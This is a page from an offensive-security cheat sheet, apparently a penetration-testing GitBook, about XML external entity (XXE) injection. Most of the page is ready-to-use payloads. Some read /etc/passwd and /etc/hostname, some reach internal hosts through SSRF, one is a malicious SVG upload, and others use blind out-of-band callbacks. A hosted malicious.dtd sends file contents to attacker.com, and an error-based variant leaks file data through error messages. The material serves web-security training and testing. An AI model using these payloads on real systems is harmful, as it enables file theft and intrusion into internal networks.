d4Rk's 1337 h4x0r guide
  • Introduction
  • Reconnaissance
    • Recon
    • OSINT
  • Enumeration
    • Network discovery
    • Port scanning
    • Webserver scanning
    • Exploit detection
    • Fuzzing
    • Process monitoring
  • Exploitation
    • Shells
      • Shells
      • TTY
    • Passwords
      • Hashcat
      • John the Ripper (JTR)
      • Hydra
      • Passwords & credentials
    • Web
      • SQL injection (SQLi)
      • Cross site scripting (XSS)
      • File inclusions (LFI, RFI)
      • Directory traversal
      • Cross site request forgery (CSRF)
      • XML external entity (XXE)
      • Cross origin resource sharing (CORS)
      • Server-side request forgery (SSRF)
      • Server-side template injection (SSTI)
      • Access control vulnerabilities
      • Authentication vulnerabilities
      • JWT attacks
      • File uploads
      • Host header attacks
      • Clickjacking
      • Logic flaws
      • OS command injection
      • HTTP Request smuggling
      • Insecure deserialization
      • DOM-based
      • WebSockets
      • Web cache poisoning
    • Buffer overflow
      • General
      • Linux
      • Windows
    • Misc
      • Evasion
      • SQSH
  • Privilege escalation
    • Linux
      • Overview
    • Windows
      • Overview
      • Mimikatz
      • PowerSploit
      • Juicy Potato, Rotten Potato (NG)
      • JAWS
      • Empire
      • SILENTTRINITY
  • Post exploitation
    • Loot
    • Pivoting
    • Standalone Tools
  • Services
    • TCP
      • TCP 21: FTP
      • TCP 22: SSH
      • TCP 23: Telnet
      • TCP 25, 587: SMTP
      • TCP 53: DNS
      • TCP 80, 443: HTTP(S)
      • TCP 88: Kerberos
      • TCP 110, 995: POP3(S)
      • TCP 111: rpcbind
      • TCP 135: MSRPC
      • TCP 139, 445: NetBIOS, SMB
      • TCP 143, 993: IMAP(S)
      • TCP 389, 636, 3268, 3269: LDAP
      • TCP 1433, UDP 1434: MSSQL Server
      • TCP 2049: NFS
      • TCP 3306: MySQL
      • TCP 3389: RDP
      • TCP 5985: WinRM
      • TCP 6379: Redis
      • TCP 27017: MongoDB
    • UDP
      • UDP 137, 138, TCP 139: NetBIOS
      • UDP 161: SNMP
    • Misc
      • Active Directoy
      • Apache Tomcat
      • Drupal
      • H2 Databases
      • IIS
      • IPsec
      • IRC
      • Java Applets
      • Java RMI
      • Jenkins
      • Joomla
      • Oracle
      • PHP
      • SharePoint
      • WordPress
  • File transfer
    • Overview
    • Wget
    • Pure-FTPd
    • TFTP
    • VBScript: Wget clone
  • Misc
    • Bash
    • Burp Suite
    • Crypto
    • Ebowla
    • Firefox extensions
    • Impacket
    • Memory forensics
    • Metasploit Framework (MSF)
    • MITM
    • Msfvenom
    • Pass the Hash (PTH)
    • PowerShell
    • PowerShell on Linux
    • Wireshark
    • Wordlists and dictionaries
  • Bug Bounty
    • Platforms
    • Tools
Powered by GitBook
On this page
  • Retrieve files
  • SSRF
  • XInclude
  • File uploads
  • Blind XXE
  • Exfiltrate data
  • Retrieve data via error message
  • Modified content type
Edit on GitHub
  1. Exploitation
  2. Web

XML external entity (XXE)

PreviousCross site request forgery (CSRF)NextCross origin resource sharing (CORS)

Last updated 2 years ago

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

--

Generally, XXE vulnerabilities arise when resolution of external entities and/or XInclude is enabled in the app/xml parser.

Retrieve files

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<some><xml>&xxe;</xml></some>

SSRF

<!DOCTYPE request [ <!ENTITY xxe SYSTEM "http://internal.website.com"> ]>

XInclude

You may be able to use XInlcude when you don't have control over the DOCTYPE element, e.g. in SOAP requests.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

File uploads

Sometimes XML based files like SVG or DOCX can be uploaded and are then processed by the app.

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
	<text font-family="Verdana" font-size="16" x="10" y="40">&xxe;
    </text>
</svg>

Blind XXE

You can use out-of-band (OAST) to detect blind XXE vulnerabilities (e.g. using Burp Collaborator).

<!DOCTYPE oast [ <!ENTITY xxe SYSTEM "https://attacker.com"> ]>

Via parameter entities:

<!DOCTYPE oast [ <!ENTITY % xxe SYSTEM "https://attacker.com"> %xxe; ]>

Exfiltrate data

Create a malicious.dtd file, hosted on attacker controlled system:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

XXE payload on target:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>

Retrieve data via error message

Create a malicious.dtd file, hosted on attacker controlled system:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

XXE payload on target:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>

Modified content type

Some apps accept text/xml as content type of POST requests instead of e.g. application/x-www-form-urlencoded. If so, malicious XML can be send to and will be proccessed by the app and my be exploitable that way.

E.g.

Wikipedia
PortSwigger - Web Security Academy - XML external entity (XXE) injection
XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250]